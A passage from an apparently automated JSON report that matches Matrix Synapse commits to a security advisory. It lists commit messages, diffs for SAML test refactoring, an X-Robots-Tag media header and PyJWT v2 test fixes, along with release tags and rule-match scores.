"v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8933, 8933", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: file", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8933", - "relevance": 2 - } - ] - }, - { - "commit_id": "01333681bc3db22541b49c194f5121a5415731c6", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608065770, - "hunks": 32, - "message": "Preparatory refactoring of the SamlHandlerTestCase (#8938) * move simple_async_mock to test_utils ... so that it can be re-used * Remove references to `SamlHandler._map_saml_response_to_user` from tests This method is going away, so we can no longer use it as a test point. Instead, factor out a higher-level method which takes a SAML object, and verify correct behaviour by mocking out `AuthHandler.complete_sso_login`. * changelog", - "diff": [ - "diff --git a/changelog.d/8938.feature b/changelog.d/8938.feature", - "new file mode 100644", - "index 000000000..d450ef499", - "--- /dev/null", - "+++ b/changelog.d/8938.feature", - "@@ -0,0 +1 @@", - "+Add support for allowing users to pick their own user ID during a single-sign-on login.", - "diff --git a/synapse/handlers/saml_handler.py b/synapse/handlers/saml_handler.py", - "index f2ca1ddb5..6001fe3e2 100644", - "--- a/synapse/handlers/saml_handler.py", - "+++ b/synapse/handlers/saml_handler.py", - "@@ -165,2 +165,25 @@ class SamlHandler(BaseHandler):", - " logger.debug(\"SAML2 response: %s\", saml2_auth.origxml)", - "+", - "+ await self._handle_authn_response(request, saml2_auth, relay_state)", - "+", - "+ async def _handle_authn_response(", - "+ self,", - "+ request: SynapseRequest,", - "+ saml2_auth: saml2.response.AuthnResponse,", - "+ relay_state: str,", - "+ ) -> None:", - "+ \"\"\"Handle an AuthnResponse, having parsed it from the request params", - "+", - "+ Assumes that the signature on the response object has been checked. Maps", - "+ the user onto an MXID, registering them if necessary, and returns a response", - "+ to the browser.", - "+", - "+ Args:", - "+ request: the incoming request from the browser. We'll respond to it with an", - "+ HTML page or a redirect", - "+ saml2_auth: the parsed AuthnResponse object", - "+ relay_state: the RelayState query param, which encodes the URI to rediret", - "+ back to", - "+ \"\"\"", - "+", - " for assertion in saml2_auth.assertions:", - "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", - "index 9878527ba..464e569ac 100644", - "--- a/tests/handlers/test_oidc.py", - "+++ b/tests/handlers/test_oidc.py", - "@@ -25,3 +25,3 @@ from synapse.types import UserID", - "-from tests.test_utils import FakeResponse", - "+from tests.test_utils import FakeResponse, simple_async_mock", - " from tests.unittest import HomeserverTestCase, override_config", - "@@ -84,12 +84,2 @@ class TestMappingProviderFailures(TestMappingProvider):", - "-def simple_async_mock(return_value=None, raises=None) -> Mock:", - "- # AsyncMock is not available in python3.5, this mimics part of its behaviour", - "- async def cb(*args, **kwargs):", - "- if raises:", - "- raise raises", - "- return return_value", - "-", - "- return Mock(side_effect=cb)", - "-", - "-", - " async def get_json(url):", - "diff --git a/tests/handlers/test_saml.py b/tests/handlers/test_saml.py", - "index d21e5588c..69927cf6b 100644", - "--- a/tests/handlers/test_saml.py", - "+++ b/tests/handlers/test_saml.py", - "@@ -14,2 +14,6 @@", - "+from typing import Optional", - "+", - "+from mock import Mock", - "+", - " import attr", - "@@ -17,4 +21,4 @@ import attr", - " from synapse.api.errors import RedirectException", - "-from synapse.handlers.sso import MappingException", - "+from tests.test_utils import simple_async_mock", - " from tests.unittest import HomeserverTestCase, override_config", - "@@ -46,2 +50,4 @@ class FakeAuthnResponse:", - " ava = attr.ib(type=dict)", - "+ assertions = attr.ib(type=list, factory=list)", - "+ in_response_to = attr.ib(type=Optional[str], default=None)", - "@@ -113,11 +119,18 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " \"\"\"Ensure that mapping the SAML response returned from a provider to an MXID works properly.\"\"\"", - "+", - "+ # stub out the auth handler", - "+ auth_handler = self.hs.get_auth_handler()", - "+ auth_handler.complete_sso_login = simple_async_mock()", - "+", - "+ # send a mocked-up SAML response to the callback", - " saml_response = FakeAuthnResponse({\"uid\": \"test_user\", \"username\": \"test_user\"})", - "- # The redirect_url doesn't matter with the default user mapping provider.", - "- redirect_url = \"\"", - "- mxid = self.get_success(", - "- self.handler._map_saml_response_to_user(", - "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", - "- )", - "+ request = _mock_request()", - "+ self.get_success(", - "+ self.handler._handle_authn_response(request, saml_response, \"redirect_uri\")", - "+ )", - "+", - "+ # check that the auth handler got called as expected", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ \"@test_user:test\", request, \"redirect_uri\"", - " )", - "- self.assertEqual(mxid, \"@test_user:test\")", - "@@ -131,2 +144,6 @@ class SamlHandlerTestCase(HomeserverTestCase):", - "+ # stub out the auth handler", - "+ auth_handler = self.hs.get_auth_handler()", - "+ auth_handler.complete_sso_login = simple_async_mock()", - "+", - " # Map a user via SSO.", - "@@ -135,17 +152,20 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " )", - "- redirect_url = \"\"", - "- mxid = self.get_success(", - "- self.handler._map_saml_response_to_user(", - "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", - "- )", - "+ request = _mock_request()", - "+ self.get_success(", - "+ self.handler._handle_authn_response(request, saml_response, \"\")", - "+ )", - "+", - "+ # check that the auth handler got called as expected", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ \"@test_user:test\", request, \"\"", - " )", - "- self.assertEqual(mxid, \"@test_user:test\")", - " # Subsequent calls should map to the same mxid.", - "- mxid = self.get_success(", - "- self.handler._map_saml_response_to_user(", - "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", - "- )", - "+ auth_handler.complete_sso_login.reset_mock()", - "+ self.get_success(", - "+ self.handler._handle_authn_response(request, saml_response, \"\")", - "+ )", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ \"@test_user:test\", request, \"\"", - " )", - "- self.assertEqual(mxid, \"@test_user:test\")", - "@@ -153,11 +173,20 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " \"\"\"If the mapping provider generates an invalid localpart it should be rejected.\"\"\"", - "+", - "+ # stub out the auth handler", - "+ auth_handler = self.hs.get_auth_handler()", - "+ auth_handler.complete_sso_login = simple_async_mock()", - "+", - "+ # mock out the error renderer too", - "+ sso_handler = self.hs.get_sso_handler()", - "+ sso_handler.render_error = Mock(return_value=None)", - "+", - " saml_response = FakeAuthnResponse({\"uid\": \"test\", \"username\": \"f\u00c3\u00b6\u00c3\u00b6\"})", - "- redirect_url = \"\"", - "- e = self.get_failure(", - "- self.handler._map_saml_response_to_user(", - "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", - "- ),", - "- MappingException,", - "+ request = _mock_request()", - "+ self.get_success(", - "+ self.handler._handle_authn_response(request, saml_response, \"\"),", - "+ )", - "+ sso_handler.render_error.assert_called_once_with(", - "+ request, \"mapping_error\", \"localpart is invalid: f\u00c3\u00b6\u00c3\u00b6\"", - " )", - "- self.assertEqual(str(e.value), \"localpart is invalid: f\u00c3\u00b6\u00c3\u00b6\")", - "+ auth_handler.complete_sso_login.assert_not_called()", - "@@ -165,2 +194,10 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " \"\"\"The mapping provider can retry generating an MXID if the MXID is already in use.\"\"\"", - "+", - "+ # stub out the auth handler and error renderer", - "+ auth_handler = self.hs.get_auth_handler()", - "+ auth_handler.complete_sso_login = simple_async_mock()", - "+ sso_handler = self.hs.get_sso_handler()", - "+ sso_handler.render_error = Mock(return_value=None)", - "+", - "+ # register a user to occupy the first-choice MXID", - " store = self.hs.get_datastore()", - "@@ -169,11 +206,15 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " )", - "+", - "+ # send the fake SAML response", - " saml_response = FakeAuthnResponse({\"uid\": \"test\", \"username\": \"test_user\"})", - "- redirect_url = \"\"", - "- mxid = self.get_success(", - "- self.handler._map_saml_response_to_user(", - "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", - "- )", - "+ request = _mock_request()", - "+ self.get_success(", - "+ self.handler._handle_authn_response(request, saml_response, \"\"),", - " )", - "+", - " # test_user is already taken, so test_user1 gets registered instead.", - "- self.assertEqual(mxid, \"@test_user1:test\")", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ \"@test_user1:test\", request, \"\"", - "+ )", - "+ auth_handler.complete_sso_login.reset_mock()", - "@@ -190,11 +231,11 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " saml_response = FakeAuthnResponse({\"uid\": \"tester\", \"username\": \"tester\"})", - "- e = self.get_failure(", - "- self.handler._map_saml_response_to_user(", - "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", - "- ),", - "- MappingException,", - "+ self.get_success(", - "+ self.handler._handle_authn_response(request, saml_response, \"\"),", - " )", - "- self.assertEqual(", - "- str(e.value), \"Unable to generate a Matrix ID from the SSO response\"", - "+ sso_handler.render_error.assert_called_once_with(", - "+ request,", - "+ \"mapping_error\",", - "+ \"Unable to generate a Matrix ID from the SSO response\",", - " )", - "+ auth_handler.complete_sso_login.assert_not_called()", - "@@ -210,8 +251,8 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " def test_map_saml_response_redirect(self):", - "+ \"\"\"Test a mapping provider that raises a RedirectException\"\"\"", - "+", - " saml_response = FakeAuthnResponse({\"uid\": \"test\", \"username\": \"test_user\"})", - "- redirect_url = \"\"", - "+ request = _mock_request()", - " e = self.get_failure(", - "- self.handler._map_saml_response_to_user(", - "- saml_response, redirect_url, \"user-agent\", \"10.10.10.10\"", - "- ),", - "+ self.handler._handle_authn_response(request, saml_response, \"\"),", - " RedirectException,", - "@@ -219 +260,6 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " self.assertEqual(e.value.location, b\"https://custom-saml-redirect/\")", - "+", - "+", - "+def _mock_request():", - "+ \"\"\"Returns a mock which will stand in as a SynapseRequest\"\"\"", - "+ return Mock(spec=[\"getClientIP\", \"get_user_agent\"])", - "diff --git a/tests/test_utils/__init__.py b/tests/test_utils/__init__.py", - "index 6873d45eb..43898d814 100644", - "--- a/tests/test_utils/__init__.py", - "+++ b/tests/test_utils/__init__.py", - "@@ -24,2 +24,4 @@ from typing import Any, Awaitable, Callable, TypeVar", - "+from mock import Mock", - "+", - " import attr", - "@@ -89,2 +91,12 @@ def setup_awaitable_errors() -> Callable[[], None]:", - "+def simple_async_mock(return_value=None, raises=None) -> Mock:", - "+ # AsyncMock is not available in python3.5, this mimics part of its behaviour", - "+ async def cb(*args, **kwargs):", - "+ if raises:", - "+ raise raises", - "+ return return_value", - "+", - "+ return Mock(side_effect=cb)", - "+", - "+", - " @attr.s" - ], - "changed_files": [ - "changelog.d/8938.feature", - "synapse/handlers/saml_handler.py", - "tests/handlers/test_oidc.py", - "tests/handlers/test_saml.py", - "tests/test_utils/__init__.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8938": "Push login completion down into SsoHandler #8941 Debian builds fail with ascii encoding error on older distros #9076" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8938, 8938", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: reference", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8938", - "relevance": 2 - } - ] - }, - { - "commit_id": "cd9e72b185e36ac3f18ab1fe567fdeee87bfcb8e", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607467863, - "hunks": 3, - "message": "Add X-Robots-Tag header to stop crawlers from indexing media (#8887) Fixes / related to: https://github.com/matrix-org/synapse/issues/6533 This should do essentially the same thing as a robots.txt file telling robots to not index the media repo. https://developers.google.com/search/reference/robots_meta_tag Signed-off-by: Aaron Raimist ", - "diff": [ - "diff --git a/changelog.d/8887.feature b/changelog.d/8887.feature", - "new file mode 100644", - "index 000000000..729eb1f1e", - "--- /dev/null", - "+++ b/changelog.d/8887.feature", - "@@ -0,0 +1 @@", - "+Add `X-Robots-Tag` header to stop web crawlers from indexing media.", - "diff --git a/synapse/rest/media/v1/_base.py b/synapse/rest/media/v1/_base.py", - "index 67aa993f1..47c2b44bf 100644", - "--- a/synapse/rest/media/v1/_base.py", - "+++ b/synapse/rest/media/v1/_base.py", - "@@ -157,2 +157,7 @@ def add_file_headers(request, media_type, file_size, upload_name):", - "+ # Tell web crawlers to not index, archive, or follow links in media. This", - "+ # should help to prevent things in the media repo from showing up in web", - "+ # search results.", - "+ request.setHeader(b\"X-Robots-Tag\", \"noindex, nofollow, noarchive, noimageindex\")", - "+", - "diff --git a/tests/rest/media/v1/test_media_storage.py b/tests/rest/media/v1/test_media_storage.py", - "index 4c749f1a6..6f0677d33 100644", - "--- a/tests/rest/media/v1/test_media_storage.py", - "+++ b/tests/rest/media/v1/test_media_storage.py", - "@@ -364 +364,14 @@ class MediaRepoTests(unittest.HomeserverTestCase):", - " )", - "+", - "+ def test_x_robots_tag_header(self):", - "+ \"\"\"", - "+ Tests that the `X-Robots-Tag` header is present, which informs web crawlers", - "+ to not index, archive, or follow links in media.", - "+ \"\"\"", - "+ channel = self._req(b\"inline; filename=out\" + self.test_image.extension)", - "+", - "+ headers = channel.headers", - "+ self.assertEqual(", - "+ headers.getRawHeaders(b\"X-Robots-Tag\"),", - "+ [b\"noindex, nofollow, noarchive, noimageindex\"],", - "+ )" - ], - "changed_files": [ - "changelog.d/8887.feature", - "synapse/rest/media/v1/_base.py", - "tests/rest/media/v1/test_media_storage.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8887": "Add X-Robots-Tag header t2bot/matrix-media-repo#303 Default robots.txt for media repo #6533" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8887, 8887", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: reference, issue, file", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8887", - "relevance": 2 - } - ] - }, - { - "commit_id": "a8026064755362fe3e5dc00f537606d340ce242a", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608660014, - "hunks": 3, - "message": "Support PyJWT v2.0.0. (#8986) Tests were broken due to an API changing. The code used in Synapse proper should be compatible with both versions already.", - "diff": [ - "diff --git a/changelog.d/8986.misc b/changelog.d/8986.misc", - "new file mode 100644", - "index 000000000..6aefc7878", - "--- /dev/null", - "+++ b/changelog.d/8986.misc", - "@@ -0,0 +1 @@", - "+Support using PyJWT v2.0.0 in the test suite.", - "diff --git a/tests/rest/client/v1/test_login.py b/tests/rest/client/v1/test_login.py", - "index 566776e97..18932d751 100644", - "--- a/tests/rest/client/v1/test_login.py", - "+++ b/tests/rest/client/v1/test_login.py", - "@@ -477,4 +477,8 @@ class JWTTestCase(unittest.HomeserverTestCase):", - "- def jwt_encode(self, token, secret=jwt_secret):", - "- return jwt.encode(token, secret, self.jwt_algorithm).decode(\"ascii\")", - "+ def jwt_encode(self, token: str, secret: str = jwt_secret) -> str:", - "+ # PyJWT 2.0.0 changed the return type of jwt.encode from bytes to str.", - "+ result = jwt.encode(token, secret, self.jwt_algorithm)", - "+ if isinstance(result, bytes):", - "+ return result.decode(\"ascii\")", - "+ return result", - "@@ -682,4 +686,8 @@ class JWTPubKeyTestCase(unittest.HomeserverTestCase):", - "- def jwt_encode(self, token, secret=jwt_privatekey):", - "- return jwt.encode(token, secret, \"RS256\").decode(\"ascii\")", - "+ def jwt_encode(self, token: str, secret: str = jwt_privatekey) -> str:", - "+ # PyJWT 2.0.0 